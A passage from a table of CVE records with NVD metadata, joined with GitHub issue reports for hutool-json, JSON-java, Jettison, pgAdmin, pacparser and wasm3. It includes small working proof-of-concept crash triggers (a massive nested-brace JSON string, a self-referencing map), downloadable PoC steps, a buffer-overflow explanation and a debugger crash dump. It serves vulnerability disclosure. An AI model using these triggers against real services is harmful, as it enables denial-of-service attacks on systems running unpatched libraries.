{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{";
JSONObject jsonObject=new JSONObject(a);
}
```
2. 堆栈信息
<img width="853" alt="image" src="https://user-images.githubusercontent.com/32029400/202833700-af209b80-d19d-4dfc-8611-91ce1358f798.png">
3. 测试涉及到的文件(注意脱密)
比如报错的Excel文件,有问题的图片等。 | Find a StackOverflowError which may lead to dos in hutool-json | https://api.github.com/repos/chinabugotech/hutool/issues/2746/comments | 1 | 2022-11-19T04:16:48Z | 2022-11-29T13:17:11Z | https://github.com/chinabugotech/hutool/issues/2746 | 1,456,194,214 | 2,746 | 4,497 |
CVE-2022-45690 | 2022-12-13T15:15:11.387 | A stack overflow in the org.json.JSONTokener.nextValue::JSONTokener.java component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2746"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/654"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/dromara/hutool/issues/2746"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stleary/JSON-java/issues/654"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:hutool:hutool:5.8.10:*:*:*:*:*:*:*",
"matchCriteriaId": "B9093201-DAC8-4158-83DA-F0DC735A7F16",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/stleary/JSON-java/issues/654 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stleary",
"JSON-java"
] | # java.lang.StackOverflowError in `org.json.JSONTokener.nextValue::JSONTokener.java:431` json-java 20210307
This vulnerability is of java.lang.StackOverflowError, and can be triggered in latest version json-java (20210307).
It is caused by triggering infinite recursive function calls under crafted user input file and can be used for attackers to launch DoS (Denial of Service) attack to exhaust the system resources for any java program that uses this library (CWE-121: Stack-based Buffer Overflow).
Likely, the root cause of this crash is in `org.json.JSONTokener.nextValue::JSONTokener.java:431`.
See more detail from the following crash stack.
# Crash stack:
The crash thread's stack is as follows:
```
java.base/java.lang.StringUTF16.checkIndex::StringUTF16.java:1470
java.base/java.lang.StringUTF16.charAt::StringUTF16.java:1267
java.base/java.lang.String.charAt::String.java:695
java.base/java.io.StringReader.read::StringReader.java:72
org.json.JSONTokener.next::JSONTokener.java:199
org.json.JSONTokener.nextClean::JSONTokener.java:292
org.json.JSONObject.<init>::JSONObject.java:225
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
org.json.JSONObject.<init>::JSONObject.java:233
org.json.JSONTokener.nextValue::JSONTokener.java:431
```
# Steps to reproduce:
1. Build the following java code with the corresponding json-java library (version 20210307).
```
## Download java-json_env_reproduce.zip from https://drive.google.com/file/d/1c0Zw2YWrOeZ08T49hmxnfh2FiNNDAImN/view?usp=sharing
unzip java-json_env_reproduce.zip
cd java-json_env_reproduce
bash build.sh
```
2. Run the built program to see the crash by feeding one of the poc file contained in the pocs.tar.gz
(poc file and report can be downloaded from https://drive.google.com/drive/folders/1J3HBq-qGi1YxfwVTCS9y5rgelqgkhUQB?usp=sharing)
e.g. :
```bash
java -jar target/Entry-1.0-SNAPSHOT-jar-with-dependencies.jar pocs/crash-a8aa8af68cf0c2e0853dfb9b0ad97f30a09a22d6
```
Any further discussion for this vulnerability including fix is welcomed!
Feel free to contact us at:
[Huang Wenjie](https://github.com/ZanderHuang)
[Zhang Cen](https://github.com/occia)
[Zhang Xiaohan](https://github.com/Han0nly) | java.lang.StackOverflowError in `org.json.JSONTokener.nextValue::JSONTokener.java:431` json-java 20210307 | https://api.github.com/repos/stleary/JSON-java/issues/654/comments | 9 | 2021-12-13T09:39:43Z | 2022-01-31T14:54:54Z | https://github.com/stleary/JSON-java/issues/654 | 1,078,292,310 | 654 | 4,498 |
CVE-2022-45693 | 2022-12-13T15:15:11.447 | Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/52"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jettison-json/jettison/issues/52"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5312"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jettison_project:jettison:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A52261E1-B166-486D-90BA-E49155176361",
"versionEndExcluding": "1.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jettison-json/jettison/issues/52 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jettison-json",
"jettison"
] | poc as follow:
```
public class POC {
public static void main(String[] args) throws JSONException {
HashMap<String,Object> map=new HashMap<>();
map.put("t",map);
JSONObject jsonObject=new JSONObject(map);
}
}
```
and the result:
<img width="953" alt="image" src="https://user-images.githubusercontent.com/32029400/200328230-2e1dc144-a183-4ca5-9b5f-eab1acbeb782.png">
| If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos | https://api.github.com/repos/jettison-json/jettison/issues/52/comments | 2 | 2022-11-07T13:58:10Z | 2023-01-04T19:29:20Z | https://github.com/jettison-json/jettison/issues/52 | 1,438,411,028 | 52 | 4,499 |
CVE-2022-4223 | 2022-12-13T16:15:26.277 | The pgAdmin server includes an HTTP API that is intended to be used to validate the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. The utility is executed by the server to determine what PostgreSQL version it is from. Versions of pgAdmin prior to 6.17 failed to properly secure this API, which could allow an unauthenticated user to call it with a path of their choosing, such as a UNC path to a server they control on a Windows machine. This would cause an appropriately named executable in the target path to be executed by the pgAdmin server. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pgadmin-org/pgadmin4/issues/5593"
},
{
"source": "secalert@redhat.com",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R5EYTPKHVFSDCETBJI7LBZE4EYHBPN2Q/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pgadmin-org/pgadmin4/issues/5593"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R5EYTPKHVFSDCETBJI7LBZE4EYHBPN2Q/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:postgresql:pgadmin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4AE369D5-2629-4B8D-9FC1-EFABF7C82345",
"versionEndExcluding": "6.17",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*",
"matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/pgadmin-org/pgadmin4/issues/5593 | [
"Third Party Advisory"
] | github.com | [
"pgadmin-org",
"pgadmin4"
] | The pgAdmin server includes an HTTP API that is intended to be used to validate the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. The utility is executed by the server to determine what PostgreSQL version it is from.
A security issue occurred with this API in pgAdmin. | Unauthenticated remote code execution while validating the binary path | https://api.github.com/repos/pgadmin-org/pgadmin4/issues/5593/comments | 1 | 2022-11-30T06:29:50Z | 2022-12-02T09:48:31Z | https://github.com/pgadmin-org/pgadmin4/issues/5593 | 1,469,116,295 | 5,593 | 4,500 |
CVE-2019-25078 | 2022-12-13T18:15:10.157 | A vulnerability classified as problematic was found in pacparser up to 1.3.x. Affected by this vulnerability is the function pacparser_find_proxy of the file src/pacparser.c. The manipulation of the argument url leads to buffer overflow. Attacking locally is a requirement. Upgrading to version 1.4.0 is able to address this issue. The name of the patch is 853e8f45607cb07b877ffd270c63dbcdd5201ad9. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215443. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/manugarg/pacparser/commit/853e8f45607cb07b877ffd270c63dbcdd5201ad9"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/manugarg/pacparser/issues/99"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/manugarg/pacparser/releases/tag/v1.4.0"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215443"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/manugarg/pacparser/commit/853e8f45607cb07b877ffd270c63dbcdd5201ad9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/manugarg/pacparser/issues/99"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/manugarg/pacparser/releases/tag/v1.4.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.215443"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pacparser_project:pacparser:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68CF258C-6303-4570-9D18-E674D93FA800",
"versionEndExcluding": "1.4.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/manugarg/pacparser/issues/99 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"manugarg",
"pacparser"
] | The following piece of code was pacparser_find_proxy
```
// URL-encode "'" as we use single quotes to stick the URL into a temporary script.
char ***sanitized_url** = str_replace(url, "'", "%27");
// Hostname shouldn't have single quotes in them
if (strchr(host, '\'')) {
print_error("%s %s\n", error_prefix,
"Invalid hostname: hostname can't have single quotes.");
return NULL;
}
script = (char*) malloc(32 + strlen(**url**) + strlen(host));
script[0] = '\0';
strcat(script, "findProxyForURL('");
strcat(script, **sanitized_url**);
strcat(script, "', '");
strcat(script, host);
strcat(script, "')");
```
The above code using stelen(url) to calculate the length of the memory malloced, however, the sanitized_url could be larger than url since one single quote character would be replaced to three characters(%27)
If there are many single quotes in the input url, then it would cause memory overwrite issue.
| memory overwrite issue for pacparser_find_proxy function | https://api.github.com/repos/manugarg/pacparser/issues/99/comments | 1 | 2019-10-08T07:27:55Z | 2022-04-13T21:30:07Z | https://github.com/manugarg/pacparser/issues/99 | 503,875,599 | 99 | 4,501 |
CVE-2022-44874 | 2022-12-13T23:15:10.850 | wasm3 commit 7890a2097569fde845881e0b352d813573e371f9 was discovered to contain a segmentation fault via the component op_CallIndirect at /m3_exec.h. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wasm3/wasm3/issues/380"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wasm3/wasm3/issues/380"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wasm3_project:wasm3:2022-08-28:*:*:*:*:*:*:*",
"matchCriteriaId": "5EE2313C-2072-40BB-B31C-00CE28DE3F99",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/wasm3/wasm3/issues/380 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wasm3",
"wasm3"
] | git commit `7890a2097569fde845881e0b352d813573e371f9`
## Gdb info
```c
Program received signal SIGSEGV, Segmentation fault.
0x0000000000535f51 in op_CallIndirect (_pc=0x62d000000498, _sp=0x631000000800, _mem=0x631000014800, _r0=1, _fp0=2.2957472741033478e-41) at /home/chuwei/tools/wasm3/source/./m3_exec.h:555
555 u32 tableIndex = slot (u32);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────────────────────
RAX 0x63100003b188 ◂— 0x0
RBX 0x7fffffffcc80 —▸ 0x514ac0 (metering_usegas) ◂— push rbp
RCX 0xc6200007631 ◂— 0x0
RDX 0x63100003b188 ◂— 0x0
RDI 0x62d000000490 ◂— 0xea62
RSI 0xc5a00000000 ◂— 0x0
R8 0x535e60 (op_CallIndirect) ◂— push rbp
R9 0x1
R10 0x0
R11 0x4
R12 0x41c6d0 (_start) ◂— xor ebp, ebp
R13 0x7fffffffdc10 ◂— 0x2
R14 0x10007fff79d4 ◂— 0xf8f8f8f8f8f8f8f8
R15 0x0
RBP 0x7fffffffc530 —▸ 0x7fffffffc5b0 —▸ 0x7fffffffc600 —▸ 0x7fffffffc650 —▸ 0x7fffffffc6a0 ◂— ...
RSP 0x7fffffffc400 —▸ 0x62d00000040c —▸ 0x100000ffd ◂— 0x0
RIP 0x535f51 (op_CallIndirect+241) ◂— mov ecx, dword ptr [rax]
─────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────
0x535f07 <op_CallIndirect+167> cmp sil, 0
0x535f0b <op_CallIndirect+171> mov qword ptr [rbp - 0x98], rdx
0x535f12 <op_CallIndirect+178> mov byte ptr [rbp - 0x99], sil
0x535f19 <op_CallIndirect+185> je op_CallIndirect+234 <op_CallIndirect+234>
↓
0x535f4a <op_CallIndirect+234> mov rax, qword ptr [rbp - 0x98]
► 0x535f51 <op_CallIndirect+241> mov ecx, dword ptr [rax]
0x535f53 <op_CallIndirect+243> mov dword ptr [rbp - 0x34], ecx
0x535f56 <op_CallIndirect+246> mov rdx, qword ptr [rbp - 0x10]
0x535f5a <op_CallIndirect+250> mov rsi, rdx
0x535f5d <op_CallIndirect+253> add rsi, 8
0x535f61 <op_CallIndirect+257> mov qword ptr [rbp - 0x10], rsi
